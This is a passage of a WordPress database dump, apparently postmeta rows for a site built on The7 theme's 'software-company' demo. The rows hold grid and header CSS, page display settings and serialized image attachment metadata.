.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  min-width: ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n'),
(4127,51,'_the7_imported_item','software-company'),
(4128,53,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665135195655{padding-bottom: 20px !important;}'),
(4130,53,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665135195655{padding-bottom: 20px !important;}'),
(4132,53,'_edit_last','1'),
(4133,53,'_wp_page_template','default'),
(4135,53,'_wpb_vc_js_status','true'),
(4136,53,'_dt_sidebar_position','disabled'),
(4137,53,'_dt_sidebar_widgetarea_id','sidebar_1'),
(4138,53,'_dt_sidebar_hide_on_mobile','0'),
(4139,53,'_dt_footer_show','0'),
(4140,53,'_dt_footer_widgetarea_id','sidebar_2'),
(4141,53,'_dt_footer_hide_on_mobile','0'),
(4142,53,'_dt_header_title','fancy'),
(4143,53,'_dt_header_background','normal'),
(4144,53,'_dt_header_background_below_slideshow','disabled'),
(4145,53,'_dt_header_transparent_bg_color','#000000'),
(4146,53,'_dt_header_transparent_bg_opacity','50'),
(4147,53,'_dt_header_transparent_bg_color_scheme','light'),
(4148,53,'_wpb_shortcodes_custom_css','.vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1665135195655{padding-bottom: 20px !important;}'),
(4149,53,'_dt_header_disabled_background','normal'),
(4150,53,'_dt_header_disabled_transparent_bg_color','#000000'),
(4151,53,'_dt_page_overrides_top_margin','0px'),
(4152,53,'_dt_header_disabled_transparent_bg_opacity','50'),
(4153,53,'_dt_page_overrides_bottom_margin','0px'),
(4154,53,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(4155,53,'_dt_header_transparent_top_bar_bg_color',''),
(4156,53,'_dt_header_transparent_top_bar_bg_opacity','0'),
(4157,53,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(4158,53,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(4159,53,'_dt_mobile_page_padding_top','0px'),
(4160,53,'_dt_mobile_page_padding_bottom','0px'),
(4161,53,'the7_fancy_title_css','#main {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n@media screen and (max-width: 778px) {\n  #main {\n    padding-top: 0px;\n    padding-bottom: 0px;\n  }\n}\n.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/10/n2.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(4162,53,'_the7_imported_item','software-company'),
(4163,388,'_wpb_shortcodes_custom_css','.vc_custom_1529516549373{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529508854682{padding-top: 50px !important;padding-bottom: 0px !important;}.vc_custom_1529516558512{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529516563909{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529516569188{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529568827418{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1529925966952{padding-bottom: 20px !important;}.vc_custom_1476022220212{padding-bottom: 40px !important;}.vc_custom_1476022224743{padding-bottom: 40px !important;}.vc_custom_1476022230071{padding-bottom: 40px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1529507376263{margin-top: 40px !important;}'),
(4164,388,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4165,388,'_wpb_shortcodes_custom_css','.vc_custom_1529516549373{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529508854682{padding-top: 50px !important;padding-bottom: 0px !important;}.vc_custom_1529516558512{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529516563909{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529516569188{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529568827418{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1529925966952{padding-bottom: 20px !important;}.vc_custom_1476022220212{padding-bottom: 40px !important;}.vc_custom_1476022224743{padding-bottom: 40px !important;}.vc_custom_1476022230071{padding-bottom: 40px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1529507376263{margin-top: 40px !important;}'),
(4166,388,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4167,388,'_edit_last','1'),
(4168,388,'_wp_page_template','default'),
(4169,388,'slide_template','default'),
(4170,388,'_wpb_vc_js_status','true'),
(4171,388,'_dt_sidebar_position','disabled'),
(4172,388,'_dt_sidebar_widgetarea_id','sidebar_1'),
(4173,388,'_dt_sidebar_hide_on_mobile','0'),
(4174,388,'_dt_footer_show','0'),
(4175,388,'_dt_footer_widgetarea_id','sidebar_1'),
(4176,388,'_dt_footer_hide_on_mobile','0'),
(4177,388,'_dt_header_title','enabled'),
(4178,388,'_dt_header_background','normal'),
(4179,388,'_dt_header_background_below_slideshow','disabled'),
(4180,388,'_dt_header_transparent_bg_color','#000000'),
(4181,388,'_dt_header_transparent_bg_opacity','50'),
(4182,388,'_dt_header_transparent_bg_color_scheme','light'),
(4183,388,'_wpb_shortcodes_custom_css','.vc_custom_1529516549373{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529508854682{padding-top: 50px !important;padding-bottom: 0px !important;}.vc_custom_1529516558512{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529516563909{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529516569188{padding-top: 70px !important;padding-bottom: 20px !important;}.vc_custom_1529568827418{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1529925966952{padding-bottom: 20px !important;}.vc_custom_1476022220212{padding-bottom: 40px !important;}.vc_custom_1476022224743{padding-bottom: 40px !important;}.vc_custom_1476022230071{padding-bottom: 40px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746388981{padding-bottom: 50px !important;}.vc_custom_1491746397816{padding-bottom: 50px !important;}.vc_custom_1529507376263{margin-top: 40px !important;}'),
(4184,388,'_dt_page_overrides_top_margin','0px'),
(4185,388,'_dt_page_overrides_bottom_margin','0px'),
(4186,388,'_dt_header_disabled_background','normal'),
(4187,388,'_dt_header_disabled_transparent_bg_color','#000000'),
(4188,388,'_dt_header_disabled_transparent_bg_opacity','50'),
(4189,388,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(4190,388,'_dt_header_transparent_top_bar_bg_color',''),
(4191,388,'_dt_header_transparent_top_bar_bg_opacity','0'),
(4192,388,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(4193,388,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(4194,388,'_dt_mobile_page_padding_top','0px'),
(4195,388,'_dt_mobile_page_padding_bottom','0px'),
(4196,388,'the7_fancy_title_css','#main {\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n@media screen and (max-width: 778px) {\n  #main {\n    padding-top: 0px;\n    padding-bottom: 0px;\n  }\n}\n'),
(4197,388,'_the7_imported_item','software-company'),
(4329,2173,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),
(4330,2173,'_edit_last','1'),
(4331,2173,'_wp_page_template','default'),
(4332,2173,'slide_template','default'),
(4333,2173,'_wpb_vc_js_status','true'),
(4334,2173,'_dt_sidebar_position','disabled'),
(4335,2173,'_dt_sidebar_widgetarea_id','sidebar_1'),
(4336,2173,'_dt_sidebar_hide_on_mobile','0'),
(4337,2173,'_dt_footer_show','0'),
(4338,2173,'_dt_footer_widgetarea_id','sidebar_2'),
(4339,2173,'_dt_footer_hide_on_mobile','0'),
(4340,2173,'_dt_header_title','enabled'),
(4341,2173,'_dt_header_background','normal'),
(4342,2173,'_dt_header_background_below_slideshow','disabled'),
(4343,2173,'_dt_header_transparent_bg_color_scheme','light'),
(4344,2173,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(4345,2173,'_dt_header_transparent_top_bar_bg_opacity','25'),
(4346,2173,'_dt_header_transparent_bg_color','#000000'),
(4347,2173,'_dt_header_transparent_bg_opacity','50'),
(4348,2173,'_dt_header_disabled_background','normal'),
(4349,2173,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(4350,2173,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(4351,2173,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(4352,2173,'_dt_header_disabled_transparent_bg_color','#000000'),
(4353,2173,'_dt_header_disabled_transparent_bg_opacity','50'),
(4354,2173,'_dt_page_overrides_top_margin',''),
(4355,2173,'_dt_page_overrides_bottom_margin',''),
(4356,2173,'the7_shortcodes_inline_css','.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .team-desc {\n  padding: 20px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .team-author-name a {\n  margin-bottom: 10px;\n  font-size: 22px;\n  line-height: 32px;\n  font-style: ;\n  font-weight: bold;\n  text-transform: ;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .team-author p {\n  margin-bottom: 10px;\n  font-style: ;\n  font-weight: bold;\n  text-transform: ;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media img {\n  max-width: 150px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .dt-css-grid .team-media img {\n  width: 150px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .team-content {\n  margin-bottom: 0px;\n  font-style: ;\n  font-weight: ;\n  text-transform: ;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:before {\n  border: 0px solid ;\n}\n.content .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:after {\n  border: 0px solid ;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .filter a,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .filter a * {\n  color: ;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .paginator a,\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4 .paginator a * {\n  color: ;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 50px;\n  grid-column-gap: 50px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -25px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  min-width: ;\n  max-width: 100%;\n  padding: 25px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 50px;\n  grid-row-gap: 50px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid {\n  margin: -25px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 25px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-260791c1407898539de5a255a094b4c4.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n'),
(4357,2173,'_the7_imported_item','software-company'),
(5094,1845,'_wp_attached_file','2018/06/it-001-hd.png'),
(5095,1845,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:534;s:6:\"height\";i:80;s:4:\"file\";s:21:\"2018/06/it-001-hd.png\";s:8:\"filesize\";i:7166;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"it-001-hd-300x45.png\";s:5:\"width\";i:300;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7688;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"it-001-hd-150x80.png\";s:5:\"width\";i:150;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1651;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5096,1845,'dt-img-hide-title','1'),
(5097,1845,'_the7_imported_item','software-company'),
(5098,1846,'_wp_attached_file','2018/06/it-001.png'),
(5099,1846,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:267;s:6:\"height\";i:40;s:4:\"file\";s:18:\"2018/06/it-001.png\";s:8:\"filesize\";i:3280;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"it-001-150x40.png\";s:5:\"width\";i:150;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1311;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5100,1846,'dt-img-hide-title','1'),
(5101,1846,'_the7_imported_item','software-company'),
(5102,1876,'_wp_attached_file','2018/06/trade02.jpg'),
(5103,1876,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:19:\"2018/06/trade02.jpg\";s:8:\"filesize\";i:89700;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"trade02-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10647;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"trade02-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74650;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"trade02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5720;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"trade02-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45483;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5104,1876,'dt-img-hide-title','1'),
(5105,1876,'_the7_imported_item','software-company'),
(5106,1877,'_wp_attached_file','2018/06/trade03.jpg'),
